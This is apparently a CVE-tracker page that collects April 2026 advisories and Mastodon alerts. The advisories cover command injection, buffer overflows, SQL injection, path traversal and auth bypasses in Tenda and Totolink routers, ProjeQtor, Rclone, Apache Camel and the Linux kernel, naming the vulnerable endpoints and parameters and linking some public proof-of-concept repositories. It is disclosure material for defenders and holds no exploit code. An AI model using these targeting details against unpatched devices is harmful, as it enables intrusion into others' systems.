updated 2026-04-27T18:57:20.293000

1 posts

A vulnerability was detected in Tenda HG3 2.0. The impacted element is an unknown function of the file /boaform/formCountrystr. The manipulation of the argument countrystr results in os command injection. The attack may be performed from remote. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-04-27T14:23:53.000Z ##

🟠 CVE-2026-7119 - High (8.8)

A vulnerability was detected in Tenda HG3 2.0. The impacted element is an unknown function of the file /boaform/formCountrystr. The manipulation of the argument countrystr results in os command injection. The attack may be performed from remote. T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7098
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T18:57:20.293000

1 posts

A security vulnerability has been detected in Tenda F456 1.0.0.5. Impacted is the function fromDhcpListClient of the file /goform/DhcpListClient of the component httpd. Such manipulation of the argument page leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.

thehackerwire@mastodon.social at 2026-04-27T10:29:29.000Z ##

🟠 CVE-2026-7098 - High (8.8)

A security vulnerability has been detected in Tenda F456 1.0.0.5. Impacted is the function fromDhcpListClient of the file /goform/DhcpListClient of the component httpd. Such manipulation of the argument page leads to buffer overflow. The attack ca...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7080
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T18:57:20.293000

2 posts

A security vulnerability has been detected in Tenda F456 1.0.0.5. This impacts the function fromPPTPUserSetting of the file /goform/PPTPUserSetting of the component httpd. Such manipulation of the argument delno leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.

offseq@infosec.exchange at 2026-04-27T09:00:29.000Z ##

⚠️ HIGH severity: Tenda F456 (v1.0.0.5) buffer overflow in httpd's fromPPTPUserSetting (CVE-2026-7080) enables remote code execution or DoS. No patch yet — restrict device exposure & monitor for updates. Details: radar.offseq.com/threat/cve-20 #OffSeq #infosec #CVE20267080

##

thehackerwire@mastodon.social at 2026-04-27T03:30:32.000Z ##

🟠 CVE-2026-7080 - High (8.8)

A security vulnerability has been detected in Tenda F456 1.0.0.5. This impacts the function fromPPTPUserSetting of the file /goform/PPTPUserSetting of the component httpd. Such manipulation of the argument delno leads to buffer overflow. The attac...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3868
(0 None)

EPSS: 0.09%

updated 2026-04-27T18:57:20.293000

1 posts

An improper handling of the length parameter inconsistency vulnerability has been identified in Moxa’s Secure Router. Because of improper validation of length parameters in the HTTPS management interface, an unauthenticated remote attacker could send specially crafted requests that trigger a buffer overflow condition, causing the web service to become unresponsive. Successful exploitation may resu

offseq@infosec.exchange at 2026-04-27T07:30:27.000Z ##

⚠️ HIGH severity: CVE-2026-3868 affects Moxa EDR-8010 v1.0 routers. Remote attackers can trigger a DoS via HTTPS mgmt interface buffer overflow. No patch yet — restrict access & monitor for outages. radar.offseq.com/threat/cve-20 #OffSeq #Moxa #Infosec #ICS

##

CVE-2026-7081
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T18:57:20.293000

2 posts

A vulnerability was detected in Tenda F456 1.0.0.5. Affected is the function fromGstDhcpSetSer of the file /goform/GstDhcpSetSer of the component httpd. Performing a manipulation of the argument dips results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used.

offseq@infosec.exchange at 2026-04-27T06:00:27.000Z ##

🛡️ CVE-2026-7081: HIGH-severity buffer overflow in Tenda F456 v1.0.0.5 (fromGstDhcpSetSer, httpd). Remote exploit possible, no patch yet. Limit remote access & watch for Tenda updates. Details: radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #Infosec #IoT

##

thehackerwire@mastodon.social at 2026-04-27T04:19:05.000Z ##

🟠 CVE-2026-7081 - High (8.8)

A vulnerability was detected in Tenda F456 1.0.0.5. Affected is the function fromGstDhcpSetSer of the file /goform/GstDhcpSetSer of the component httpd. Performing a manipulation of the argument dips results in buffer overflow. Remote exploitation...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7078
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T18:57:20.293000

1 posts

A security flaw has been discovered in Tenda F456 1.0.0.5. The impacted element is the function fromSetIpBind of the file /goform/SetIpBind of the component httpd. The manipulation of the argument page results in buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks.

thehackerwire@mastodon.social at 2026-04-27T03:30:51.000Z ##

🟠 CVE-2026-7078 - High (8.8)

A security flaw has been discovered in Tenda F456 1.0.0.5. The impacted element is the function fromSetIpBind of the file /goform/SetIpBind of the component httpd. The manipulation of the argument page results in buffer overflow. The attack can be...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42363
(9.3 CRITICAL)

EPSS: 0.03%

updated 2026-04-27T18:57:20.293000

2 posts

An insufficient encryption vulnerability exists in the Device Authentication functionality of GeoVision GV-IP Device Utility 9.0.5. Listening to broadcast packets can lead to credentials leak. An attacker can listen to broadcast messages to trigger this vulnerability. When interacting with various Geovision devices on the network, the utility may send privileged commands; in order to do so, the

offseq@infosec.exchange at 2026-04-27T01:30:27.000Z ##

🚨CRITICAL: CVE-2026-42363 in GeoVision GV-IP Device Utility 9.0.5 exposes admin creds via UDP broadcast with weak encryption. Attackers on LAN can take full control. Limit access, avoid untrusted networks, and watch for patches. radar.offseq.com/threat/cve-20 #OffSeq #infosec #IoTSecurity

##

thehackerwire@mastodon.social at 2026-04-27T00:21:39.000Z ##

🔴 CVE-2026-42363 - Critical (9.3)

An insufficient encryption vulnerability exists in the Device Authentication functionality of GeoVision GV-IP Device Utility 9.0.5. Listening to broadcast packets can lead to credentials leak. An attacker can listen to broadcast messages to trigge...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7055
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T18:57:20.293000

1 posts

A security vulnerability has been detected in Tenda F456 1.0.0.5. This issue affects the function fromVirtualSer of the file /goform/VirtualSer of the component httpd. The manipulation of the argument menufacturer/Go leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used.

thehackerwire@mastodon.social at 2026-04-26T23:00:19.000Z ##

🟠 CVE-2026-7055 - High (8.8)

A security vulnerability has been detected in Tenda F456 1.0.0.5. This issue affects the function fromVirtualSer of the file /goform/VirtualSer of the component httpd. The manipulation of the argument menufacturer/Go leads to buffer overflow. The ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7057
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T18:57:20.293000

1 posts

A flaw has been found in Tenda F456 1.0.0.5. The affected element is an unknown function of the file /goform/setcfm of the component httpd. This manipulation of the argument funcname/funcpara1 causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used.

thehackerwire@mastodon.social at 2026-04-26T22:59:47.000Z ##

🟠 CVE-2026-7057 - High (8.8)

A flaw has been found in Tenda F456 1.0.0.5. The affected element is an unknown function of the file /goform/setcfm of the component httpd. This manipulation of the argument funcname/funcpara1 causes buffer overflow. It is possible to initiate the...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7106
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T18:38:48.527000

1 posts

The Highland Software Custom Role Manager plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 1.0.0. This is due to insufficient authorization checks in the hscrm_save_user_roles() function, which is hooked to the personal_options_update action accessible by any authenticated user. This makes it possible for authenticated attackers, with Subscriber-level acce

thehackerwire@mastodon.social at 2026-04-27T03:30:42.000Z ##

🟠 CVE-2026-7106 - High (8.8)

The Highland Software Custom Role Manager plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 1.0.0. This is due to insufficient authorization checks in the hscrm_save_user_roles() function, which is hooked t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22337
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-04-27T18:37:59.213000

1 posts

Incorrect Privilege Assignment vulnerability in Directorist Directorist Social Login allows Privilege Escalation.This issue affects Directorist Social Login: from n/a before 2.1.4.

thehackerwire@mastodon.social at 2026-04-27T15:23:04.000Z ##

🔴 CVE-2026-22337 - Critical (9.8)

Incorrect Privilege Assignment vulnerability in Directorist Directorist Social Login allows Privilege Escalation.This issue affects Directorist Social Login: from n/a before 2.1.4.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7124
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T18:36:42.937000

1 posts

A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. Affected by this vulnerability is the function setIpv6LanCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument addrPrefixLen can lead to os command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-04-27T14:00:12.000Z ##

🔴 CVE-2026-7124 - Critical (9.8)

A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. Affected by this vulnerability is the function setIpv6LanCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument addrPrefix...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7123
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T18:36:42.937000

1 posts

A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function setIptvCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument setIptvCfg results in os command injection. The attack can be initiated remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-04-27T14:00:02.000Z ##

🔴 CVE-2026-7123 - Critical (9.8)

A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function setIptvCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument setIptvCfg results in os command inject...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41463
(8.8 HIGH)

EPSS: 0.42%

updated 2026-04-27T18:36:19.637000

1 posts

ProjeQtor versions 7.0 through 12.4.3 contain a ZipSlip path traversal vulnerability in the plugin upload functionality that allows authenticated attackers with upload permissions to write files outside the intended extraction directory by crafting ZIP archives with directory traversal sequences. Attackers can exploit unvalidated archive extraction to write a PHP webshell to a web-accessible direc

thehackerwire@mastodon.social at 2026-04-27T16:25:03.000Z ##

🟠 CVE-2026-41463 - High (8.8)

ProjeQtor versions 7.0 through 12.4.3 contain a ZipSlip path traversal vulnerability in the plugin upload functionality that allows authenticated attackers with upload permissions to write files outside the intended extraction directory by craftin...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41462
(9.8 CRITICAL)

EPSS: 0.09%

updated 2026-04-27T18:36:19.637000

1 posts

ProjeQtor versions 7.0 through 12.4.3 contain an unauthenticated SQL injection vulnerability in the login functionality where the login variable is directly concatenated into a SQL query without parameterization or sanitization. Attackers can inject arbitrary SQL expressions through the username field at the authentication endpoint to create privileged accounts, read sensitive data, and execute op

1 repos

https://github.com/0xBlackash/CVE-2026-41462

thehackerwire@mastodon.social at 2026-04-27T16:24:54.000Z ##

🔴 CVE-2026-41462 - Critical (9.8)

ProjeQtor versions 7.0 through 12.4.3 contain an unauthenticated SQL injection vulnerability in the login functionality where the login variable is directly concatenated into a SQL query without parameterization or sanitization. Attackers can inje...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7137
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T18:35:53.583000

2 posts

A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setStorageCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument sambaEnabled leads to os command injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used.

Matchbook3469@mastodon.social at 2026-04-28T23:32:31.000Z ##

🔴 New security advisory:

CVE-2026-7137 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#Cybersecurity #PatchNow #InfoSecCommunity

##

thehackerwire@mastodon.social at 2026-04-27T16:24:00.000Z ##

🔴 CVE-2026-7137 - Critical (9.8)

A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setStorageCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument sambaEnabled leads to os co...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7139
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T18:35:53.583000

1 posts

A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setWiFiAclRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument mode causes os command injection. The attack is possible to be carried out remotely. The exploit has been published and may be used.

thehackerwire@mastodon.social at 2026-04-27T21:01:00.000Z ##

🔴 CVE-2026-7139 - Critical (9.8)

A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setWiFiAclRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument mode causes os command injection. The a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7138
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T18:35:53.583000

1 posts

A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setNtpCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument tz results in os command injection. The attack can be executed remotely. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-04-27T16:24:09.000Z ##

🔴 CVE-2026-7138 - Critical (9.8)

A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setNtpCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument tz results in os command inject...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31673
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T18:32:22.917000

1 posts

In the Linux kernel, the following vulnerability has been resolved: af_unix: read UNIX_DIAG_VFS data under unix_state_lock Exact UNIX diag lookups hold a reference to the socket, but not to u->path. Meanwhile, unix_release_sock() clears u->path under unix_state_lock() and drops the path reference after unlocking. Read the inode and device numbers for UNIX_DIAG_VFS while holding unix_state_lock(

thehackerwire@mastodon.social at 2026-04-27T23:06:00.000Z ##

🟠 CVE-2026-31673 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

af_unix: read UNIX_DIAG_VFS data under unix_state_lock

Exact UNIX diag lookups hold a reference to the socket, but not to
u->path. Meanwhile, unix_release_sock() clears u->path ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31682
(9.1 CRITICAL)

EPSS: 0.07%

updated 2026-04-27T18:32:22.917000

1 posts

In the Linux kernel, the following vulnerability has been resolved: bridge: br_nd_send: linearize skb before parsing ND options br_nd_send() parses neighbour discovery options from ns->opt[] and assumes that these options are in the linear part of request. Its callers only guarantee that the ICMPv6 header and target address are available, so the option area can still be non-linear. Parsing ns->

thehackerwire@mastodon.social at 2026-04-27T23:05:51.000Z ##

🔴 CVE-2026-31682 - Critical (9.1)

In the Linux kernel, the following vulnerability has been resolved:

bridge: br_nd_send: linearize skb before parsing ND options

br_nd_send() parses neighbour discovery options from ns->opt[] and
assumes that these options are in the linear part ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31680
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T18:32:22.917000

1 posts

In the Linux kernel, the following vulnerability has been resolved: net: ipv6: flowlabel: defer exclusive option free until RCU teardown `ip6fl_seq_show()` walks the global flowlabel hash under the seq-file RCU read-side lock and prints `fl->opt->opt_nflen` when an option block is present. Exclusive flowlabels currently free `fl->opt` as soon as `fl->users` drops to zero in `fl_release()`. Howe

thehackerwire@mastodon.social at 2026-04-27T23:00:41.000Z ##

🟠 CVE-2026-31680 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

net: ipv6: flowlabel: defer exclusive option free until RCU teardown

`ip6fl_seq_show()` walks the global flowlabel hash under the seq-file
RCU read-side lock and prints `fl->opt...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31678
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T18:32:22.917000

1 posts

In the Linux kernel, the following vulnerability has been resolved: openvswitch: defer tunnel netdev_put to RCU release ovs_netdev_tunnel_destroy() may run after NETDEV_UNREGISTER already detached the device. Dropping the netdev reference in destroy can race with concurrent readers that still observe vport->dev. Do not release vport->dev in ovs_netdev_tunnel_destroy(). Instead, let vport_netdev

thehackerwire@mastodon.social at 2026-04-27T23:00:27.000Z ##

🟠 CVE-2026-31678 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

openvswitch: defer tunnel netdev_put to RCU release

ovs_netdev_tunnel_destroy() may run after NETDEV_UNREGISTER already
detached the device. Dropping the netdev reference in des...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31676
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-27T18:32:22.917000

1 posts

In the Linux kernel, the following vulnerability has been resolved: rxrpc: only handle RESPONSE during service challenge Only process RESPONSE packets while the service connection is still in RXRPC_CONN_SERVICE_CHALLENGING. Check that state under state_lock before running response verification and security initialization, then use a local secured flag to decide whether to queue the secured-conne

thehackerwire@mastodon.social at 2026-04-27T23:00:16.000Z ##

🟠 CVE-2026-31676 - High (7.5)

In the Linux kernel, the following vulnerability has been resolved:

rxrpc: only handle RESPONSE during service challenge

Only process RESPONSE packets while the service connection is still in
RXRPC_CONN_SERVICE_CHALLENGING. Check that state unde...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31675
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T18:32:22.917000

1 posts

In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_netem: fix out-of-bounds access in packet corruption In netem_enqueue(), the packet corruption logic uses get_random_u32_below(skb_headlen(skb)) to select an index for modifying skb->data. When an AF_PACKET TX_RING sends fully non-linear packets over an IPIP tunnel, skb_headlen(skb) evaluates to 0. Passing 0 to g

thehackerwire@mastodon.social at 2026-04-27T22:03:40.000Z ##

🟠 CVE-2026-31675 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

net/sched: sch_netem: fix out-of-bounds access in packet corruption

In netem_enqueue(), the packet corruption logic uses
get_random_u32_below(skb_headlen(skb)) to select an inde...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31685
(9.4 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T18:32:22.917000

1 posts

In the Linux kernel, the following vulnerability has been resolved: netfilter: ip6t_eui64: reject invalid MAC header for all packets `eui64_mt6()` derives a modified EUI-64 from the Ethernet source address and compares it with the low 64 bits of the IPv6 source address. The existing guard only rejects an invalid MAC header when `par->fragoff != 0`. For packets with `par->fragoff == 0`, `eui64_m

thehackerwire@mastodon.social at 2026-04-27T22:03:30.000Z ##

🔴 CVE-2026-31685 - Critical (9.4)

In the Linux kernel, the following vulnerability has been resolved:

netfilter: ip6t_eui64: reject invalid MAC header for all packets

`eui64_mt6()` derives a modified EUI-64 from the Ethernet source address
and compares it with the low 64 bits of...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-38934
(8.8 HIGH)

EPSS: 0.02%

updated 2026-04-27T18:32:15

2 posts

Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.3.5. and before allows a remote attacker to escalate privileges and obtain sensitive information via the public/settings_process.php

1 repos

https://github.com/VadlaReddySai/diskoverdata-cve-writeups

thehackerwire@mastodon.social at 2026-04-27T21:17:12.000Z ##

🟠 CVE-2026-38934 - High (8.8)

Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.3.5. and before allows a remote attacker to escalate privileges and obtain sensitive information via the public/settings_process.php

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-27T21:16:31.000Z ##

🟠 CVE-2026-38934 - High (8.8)

Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.3.5. and before allows a remote attacker to escalate privileges and obtain sensitive information via the public/settings_process.php

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7140
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T18:32:15

2 posts

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function CsteSystem of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument HTTP leads to os command injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-27T21:17:02.000Z ##

🔴 CVE-2026-7140 - Critical (9.8)

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function CsteSystem of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument HTTP leads to os command injection. The at...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-27T21:16:22.000Z ##

🔴 CVE-2026-7140 - Critical (9.8)

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function CsteSystem of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument HTTP leads to os command injection. The at...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7136
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T18:32:15

1 posts

A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Affected by this issue is the function setDmzCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument wanIdx can lead to os command injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-27T16:24:19.000Z ##

🔴 CVE-2026-7136 - Critical (9.8)

A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Affected by this issue is the function setDmzCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument wanIdx can lead to os ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-30351
(7.5 HIGH)

EPSS: 0.01%

updated 2026-04-27T18:32:07

1 posts

A path traversal vulnerability in the UI/static component of leonvanzyl autocoder commit 79d02a allows attackers to read arbitrary files via sending crafted URL path containing traversal sequences.

thehackerwire@mastodon.social at 2026-04-27T16:25:13.000Z ##

🟠 CVE-2026-30351 - High (7.5)

A path traversal vulnerability in the UI/static component of leonvanzyl autocoder commit 79d02a allows attackers to read arbitrary files via sending crafted URL path containing traversal sequences.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40860
(9.8 CRITICAL)

EPSS: 0.39%

updated 2026-04-27T18:32:05

2 posts

JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer,

Matchbook3469@mastodon.social at 2026-04-28T15:32:55.000Z ##

⛔ New security advisory:

CVE-2026-40860 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#CVE #SecurityPatching #HackerNews

##

thehackerwire@mastodon.social at 2026-04-27T22:01:11.000Z ##

🔴 CVE-2026-40860 - Critical (9.8)

JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class al...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41176
(9.8 CRITICAL)

EPSS: 6.30%

updated 2026-04-27T18:19:45.303000

1 posts

Rclone is a command-line program to sync files and directories to and from different cloud storage providers. The RC endpoint `options/set` is exposed without `AuthRequired: true`, but it can mutate global runtime configuration, including the RC option block itself. Starting in version 1.45.0 and prior to version 1.73.5, an unauthenticated attacker can set `rc.NoAuth=true`, which disables the auth

Nuclei template

secdb@infosec.exchange at 2026-04-27T00:01:17.000Z ##

📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at secdb.nttzen.cloud/dashboard

Total CVEs: 1459

Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321

Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142

Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40

Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11

Top EPSS Score:
- CVE-2026-5965 - 6.34 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41179 - 5.98 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-40887 - 4.56 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-38834 - 3.22 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41176 - 2.79 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-21571 - 1.10 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-6799 - 1.06 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-24467 - 0.76 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41472 - 0.67 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2019-25714 - 0.60 % (secdb.nttzen.cloud/cve/detail/)

##

CVE-2026-38834
(7.3 HIGH)

EPSS: 13.21%

updated 2026-04-27T16:44:38.997000

1 posts

Tenda W30E V2.0 V16.01.0.21 was found to contain a command injection vulnerability in the do_ping_action function via the hostName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

secdb@infosec.exchange at 2026-04-27T00:01:17.000Z ##

📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at secdb.nttzen.cloud/dashboard

Total CVEs: 1459

Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321

Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142

Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40

Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11

Top EPSS Score:
- CVE-2026-5965 - 6.34 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41179 - 5.98 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-40887 - 4.56 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-38834 - 3.22 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41176 - 2.79 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-21571 - 1.10 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-6799 - 1.06 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-24467 - 0.76 % (secdb.nttzen.cloud/cve/detail/)
